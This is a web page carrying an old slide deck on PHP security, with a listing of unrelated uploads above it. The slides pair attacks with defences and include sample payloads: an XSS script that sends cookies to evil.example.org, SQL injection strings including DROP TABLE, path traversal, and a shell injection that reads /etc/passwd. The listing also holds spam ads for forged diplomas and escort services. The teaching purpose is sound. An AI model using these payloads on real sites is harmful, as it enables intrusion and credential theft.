Unveiling the Future: Sylius 2.0 New FeaturesŁukasz Chruściel
 

Recently uploaded (20)

Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their Engineering
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)Recruitment Management Software Benefits (Infographic)
Recruitment Management Software Benefits (Infographic)
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalm
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdf
 
cpct NetworkING BASICS AND NETWORK TOOL.ppt
cpct NetworkING BASICS AND NETWORK TOOL.pptcpct NetworkING BASICS AND NETWORK TOOL.ppt
cpct NetworkING BASICS AND NETWORK TOOL.ppt
 
PREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentationPREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentation
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprise
 
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
 
Odoo Development Company in India | Devintelle Consulting Service
Odoo Development Company in India | Devintelle Consulting ServiceOdoo Development Company in India | Devintelle Consulting Service
Odoo Development Company in India | Devintelle Consulting Service
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New Features
 

PHP Secure Programming

  • 1. 1 PHP Attacks and Defense K.Bala Vignesh kbalavignesh@gmail.com
  • 2. 2 Most Secured computer in the WORLD No Need to secure the OS No Need to secure the S/W No need to do Anything It's Naturally Secured
  • 3. 3 Even No Need to Switch ON
  • 5. 5 Fact : 1 PHP Mainly for Web Programs Fact : 2 Easy To Learn
  • 6. 6 PHP: 20,917,850 domains, 1,224,183 IP addresses Fact : 3 Fact : 4 More Flexible Functions
  • 7. 7 Few Named threats Code Injection SQL Injection Cross Site Script (XSS) Session Hijacking Session Fixation Temp Files abuse Remote Execution More and More unNamed threats...
  • 9. Code Injection 9 Dont directly pass the filenames $filename = $_REQUEST['message']; $message = file_get_contents($filename); print $message; This is ok: http://example.com/myscript.php?message=hello.txt But what if I do like this?: http://example.com/myscript.php?message=passwords.txt
  • 10. Code Injection 10 This is especially important for includes, require and require_once $module = $_REQUEST['module']; include(“lib/$module”); This is ok: http://example.com/cms?module=login.php But what if I do like this?: http://example.com/cms?module=../passwords.ini
  • 11. Defense Code Injection 11 Make sure the value is one you expected, if not...ERROR! $requestedModule = $_REQUEST['module']; switch($requestedModule) { case “login”: $module = “login”; break; case “logout”: $module = “logout”; break; default: $module = “error”; }
  • 13. 13 Form to user search .... $username=$_POST['username']; $query= "SELECT * FROM users WHERE name = ' “ .$username." ' ;" If i give , $username ­­­a' or 't'='t Query will be , "SELECT * FROM users WHERE name = ' a' or 't'='t ';" SQL Injection
  • 14. 14 If i give , $username ­­­a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '% Query will be , SELECT * FROM users WHERE name = ' a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% '; SQL Injection
  • 15. 15 Use single quotation eg: "select * from users where user= '.$username.'" Check types of user submitted values is_bool(), is_float(), is_numeric(), is_string(), is_int() , intval() , settype() ,strlen() eg: strpos($query , ';') Escape every questionable character in your query ' " , ; ( ) and keywords "FROM", "LIKE", and "WHERE" mysql_real_escape_string SQL Injection Defense
  • 16. 16 magic_quotes_gpc (default – on ) (deprecation – php 6.0) If Off use addslashes If On , If you don't need stripslashes if (get_magic_quotes_gpc()){ $_GET = array_map('stripslashes', $_GET); $_POST = array_map('stripslashes', $_POST); $_COOKIE = array_map('stripslashes', $_COOKIE); } SQL Injection Defense
  • 17. 17 Mysql Improved Extension $query=mysqli_prepare($connection_string, "select * from user where user= ?"); mysqli_stmt_bind_param($query,"s",$username); mysqli_stmt_execute($query); s­string i­integer d­double b­binary PEAR ­DB, DataObject SQL Injection Defense
  • 18. 18 XSS – Cross Site Scripting
  • 19. 19 1.) Inserting scripts <script> document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie </script> 2.) Login 3.) Set Cookies 4.) Executes the scripts XSS 5.) Steals the cookies
  • 20. 20 Remote control of the client browser Reveal the value of a cookie Change links on the page Redirect to another URI Render a bogus form or Any undesirable action ... XSS
  • 21. Defense XSS Encode HTML Entities in All Non­HTML Output 21 htmlentities() Eg: $str = "A 'quote' is <b>bold</b>"; echo htmlentities($str); Outputs Will be ­> A 'quote' is &lt;b&gt;bold&lt;/b&gt; Check the image upload URI (avatar, icon) parse_url Eg: <img src=”http://shopping.example.com/addCart.php?item=123”/> Show the domain name for User submitted Links eg. Not safe ­­> Hey click this to see my photo <a href=”http://badguys.net”>Bala</a> safe ­­> Hey click this to see my photo [badguys.net] Bala
  • 23. 23 What is Session ID ?
  • 24. 24 Victim Attacker Web Server Session ID= AD238723FD32 Session Hijacking
  • 25. 25 Victim Attacker Web Server Session ID= AD238723FD32 Session ID= AD238723FD32 Session Hijacking
  • 26. Session Hijacking 26 Network Eavesdropping ­Promiscuous Mode If Intranet ? Use Switch rather than a Hub If wi­fi ? WEP ­Weired Equivalent Privacy If Internet ? SSL
  • 27. 27 Session Hijacking Unwitting Exposure Sending links See this item ­­­­http:// store.com/items.php?item=0987 it's O.K , if i send like this, http://store.com/items.php?item=0987&phpsessid=34223 How to Avoid ? session.use_trans_sid (turned off by default) session.use_only_cookies (Defaults to 1 (enabled) since PHP 6.0.)
  • 28. 28 2.) If he clicks, http://unsafesite?SID=3423 3. Shows login page Victim Session Fixation Attacker Web Server 1.) See this link http://unsafesite?SID=3423 Set SessionID =3423 session_id($_GET['SID']) 4.) Now Full Access http://unsafesite?SID=3423
  • 29. 29 Session Hijacking Defense Use SSL. Use Cookies Instead of $_GET Variables. (ini_set ('session.use_only_cookies',TRUE); ini_set ('session.use_trans_sid',FALSE); Use Session Timeouts ini_set('session.cookie_lifetime',1200) ini_set('session.gc_maxlifetime) Regenerate IDs for Users with Changed Status session_regenerate_id
  • 31. Remote Execution 31 Injection of Shell commands <?php $filename=$_GET['filename']; $command='/usr/bin/wc $filename”; $words=shell_exec ($command); print “$filename contains $words words.”; ?> This is ok ... wordcount.php?filename=textfile.txt But, What if i give like this ... wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd (filename ­­> /dev/null | cat /etc/passwd ) /usr/bin/wc /dev/null |cat /etc/passwd
  • 32. Remote Execution 32 Defense Allow only Trusted , Human Users to Import Code Store uploads outside of Web Document Root Limit allowable filename extensions for upload Use disable_functions directive eg: disable_functions= “eval,phpinfo” Do not include PHP scripts from Remote Servers eg: <?php include ('http://example.net/code/common.php') ?> Properly escape all shell commands escapeshellarg() , escapeshellcmd()
  • 33. 33 Future? ­PHP 6.0 Deprecation Register Globals Big security hole Safe Mode False sense of security Magic Quotes Messed with the data Upcoming changes and features http://www.php.net/~derick/meeting­notes. html http://www.phphacks.com/content/view/49/33/ Rasmus Lerdorf – PHP 6.0 Wish List http://news.php.net/php.internals/17883
  • 34. 34 What to do? Proper Input Validation Dont do Programming + Security Do secure Programming htmlentities, mysql_real_escape_string, parse_url , addslashes ,escapeshellarg, escapeshellcmd... etc SSL Use PEAR , PECL
  • 35. Images From Flickr.com 35 reference­http:// flickr.com/photos/opinicus/246099418/ remote_boy ­http:// flickr.com/photo_zoom.gne?id=331355695&size=l level_cross ­http:// flickr.com/photo_zoom.gne?id=67342604&size=o injection3­http:// flickr.com/photos/fleurdelisa/249435636/ building game1­http:// flickr.com/photo_zoom.gne?id=346575350&size=o computer_baby1­http:// flickr.com/photo_zoom.gne?id=102207751&size=o country_border1 ­http:// flickr.com/photo_zoom.gne?id=48740674&size=l computer_baby ­http:// flickr.com/photo_zoom.gne?id=436594815&size=m hijack ­http:// flickr.com/photo_zoom.gne?id=463129891&size=l dog_security ­http:// flickr.com/photo_zoom.gne?id=2205272682&size=l Id card ­http:// flickr.com/photo_zoom.gne?id=1269802640&size=o
  • 36. 36 Reference Pro PHP Security Chris Snyder , Michael Southwell http://wikipedia.org/ http://www.sitepoint.com/article/php­security­blunders http://phpsec.org/ WWW.google.com
  • 37. 37
  • 38. 38
  • 39. Copyright (c) 2008 Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. http://www.gnu.org/copyleft/fdl.html